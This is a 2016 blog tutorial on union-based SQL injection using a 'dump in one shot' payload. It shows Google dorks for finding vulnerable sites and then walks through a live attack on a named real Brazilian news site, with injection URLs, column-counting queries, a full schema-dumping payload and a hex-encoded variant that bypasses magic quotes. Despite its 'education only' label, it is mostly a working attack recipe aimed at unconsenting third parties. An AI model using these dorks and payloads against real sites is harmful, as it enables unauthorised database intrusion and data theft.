Saturday, April 16, 2016

Union Based DIOS (Dump In One Shot) SQL Injection

!! FOR EDUCATION PURPOSES ONLY !!

I Introduction
Hey guys! today i'm gonna teach you how to DIOS in union based SQL Injection

II Learning Basics
So here we go again you need to learn the basics. Ofcourse you already knew it i just want to repeat lol.

1)Google dorks
what is google dorks? 
Google dorks are used for easier searching like "inurl" "intext" like that

why do we need that?
No we really dont need that, Just kidding ofcourse we need that to get target websites!

how do we use it?
so for example go to google and search: " inurl:news.php?id= "
you'll see the results like www.website.com/news.php?id=5

II Finding target
google : " inurl:news.php?id= "
You can do your own google dork if you want, the common dorks is

inurl:page.php?id=19
inurl:gallery.php?id=19
inurl:view.php?id=19
inurl:article.php?id=19
inurl:buy.php?id=19

so get some target and lets start.

III Checking if vulnerable to SQL Injection

After getting a website target, we will now check if its vulnerable to SQL injection or not.
example this is my target : http://jornaldacidadearuja.com.br/guia/det.php?id=19

You'll add a colon " ' " to the end of the number
http://jornaldacidadearuja.com.br/guia/det.php?id=19'

now if you see an errored text or lookes like the page doesnt look normal, then theres a chance that its vulnerable to SQL injection
but if the page loads normally, too bad. Its not vulnerable.

What to do if its not vulnerable?
ofcourse find another website xD

IV Counting vulnerable columns
After you find it vulnerable to SQL injection, its time to count the columns using the order by.
http://jornaldacidadearuja.com.br/guia/det.php?id=19 order by 1--
increase the number 1 until you you get an error

http://jornaldacidadearuja.com.br/guia/det.php?id=19 order by 1-- ("No error")
http://jornaldacidadearuja.com.br/guia/det.php?id=19 order by 2-- ("no error")
http://jornaldacidadearuja.com.br/guia/det.php?id=19 order by 10--("No error?!")
http://jornaldacidadearuja.com.br/guia/det.php?id=19 order by 100000--("No error?!!")

So if that things happen you got in 99999 and still no error.
that means the ID is a string, not integer.

So how we will fix it?
Just simply add " ' " after the start and add " + " in the end.
http://jornaldacidadearuja.com.br/guia/det.php?id=19' order by 1--+

Start:
http://jornaldacidadearuja.com.br/guia/det.php?id=19' order by 10--+ ("no error")
http://jornaldacidadearuja.com.br/guia/det.php?id=19' order by 20--+ ("ERROR")
http://jornaldacidadearuja.com.br/guia/det.php?id=19' order by 15--+ ("no error")http://jornaldacidadearuja.com.br/guia/det.php?id=19' order by 16--+ ("no error")
http://jornaldacidadearuja.com.br/guia/det.php?id=19' order by 17--+ ("no error")

http://jornaldacidadearuja.com.br/guia/det.php?id=19' order by 18--+ ("no error")http://jornaldacidadearuja.com.br/guia/det.php?id=19' order by 19--+ ("Error!!!!")

There we go! we know that there is 18 columns. Now we will check now what is the injectable column!

V Getting injectable column
Now we knew there is 18 columns, we will now get the injectable column
Our payload will be " and false union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 "
so the url will be http://jornaldacidadearuja.com.br/guia/det.php?id=19' and false union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--+
Heyy! Column 6 is injectable column

VI DIOS ( Dump In One Shot )
Our payload for Dump In One Shot is (select (@a) from (select(@a:=0x00),(@tbl:=0x00),(select (@a) from (information_schema.columns) where (table_schema!='information_schema') and(0x00)in (@a:=concat(@a,0x3c62723e,if( (@tbl!=table_name), Concat(0x3c62723e,table_schema,' :: ',@tbl:=table_name,' ',column_name), (column_name))))))a)
And wolah! dumped in one shot!

VII Magic Quotes enabled
If it didn't worked for you then lets say the magic quotes enabled.
What is magic quote?
magic quote is replace the " ' " to " \' "
How to bypass it?
Its easy. Just hex those stringed texts. The payload will be
(select(@a) from (select(@a:=0x00),(@tbl:=0x00),(select (@a) from (information_schema.columns) where (table_schema!=0x696e666f726d6174696f6e5f736368656d61) and(0x00)in (@a:=concat(@a,0x3c62723e,if( (@tbl!=table_name), Concat(0x3c62723e,table_schema,0x203a3a20,@tbl:=table_name,0x20,column_name), (column_name))))))a)

VIII Goodbye
So hope you learned something in this tutorial, if you have some questions and feedback please feel free to comment!

2 comments: